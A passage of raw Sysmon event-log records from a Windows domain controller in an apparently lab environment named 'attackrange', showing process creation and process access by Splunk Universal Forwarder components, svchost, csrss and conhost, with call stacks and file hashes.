Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000005109Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:43:45.394{59A5CD1D-9091-6005-1D01-00000000A301}3088C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT 
AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000005135Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:43:46.065{59A5CD1D-8EE3-6005-B500-00000000A301}28363856C:\Windows\system32\conhost.exe{59A5CD1D-9092-6005-1E01-00000000A301}4656C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005134Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:43:46.065{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005133Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:43:46.065{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005132Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:43:46.065{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005131Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:43:46.065{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005130Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:43:46.065{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005129Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:43:46.065{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005128Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:43:46.065{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005127Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:43:46.065{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005126Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:43:46.065{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005125Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:43:46.065{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-9092-6005-1E01-00000000A301}4656C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000005124Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:43:46.065{59A5CD1D-8EE3-6005-B100-00000000A301}41243752C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{59A5CD1D-9092-6005-1E01-00000000A301}4656C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000005123Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:43:46.066{59A5CD1D-9092-6005-1E01-00000000A301}4656C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT 
AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000005149Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:43:47.362{59A5CD1D-9093-6005-1F01-00000000A301}49284924C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005148Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:43:47.221{59A5CD1D-8EE3-6005-B500-00000000A301}28363856C:\Windows\system32\conhost.exe{59A5CD1D-9093-6005-1F01-00000000A301}4928C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005147Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:43:47.221{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005146Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:43:47.221{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005145Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:43:47.221{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005144Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:43:47.221{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005143Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:43:47.221{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005142Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:43:47.221{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005141Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:43:47.221{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005140Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:43:47.221{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005139Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:43:47.221{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005138Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:43:47.221{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-9093-6005-1F01-00000000A301}4928C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000005137Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:43:47.221{59A5CD1D-8EE3-6005-B100-00000000A301}41243752C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{59A5CD1D-9093-6005-1F01-00000000A301}4928C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program 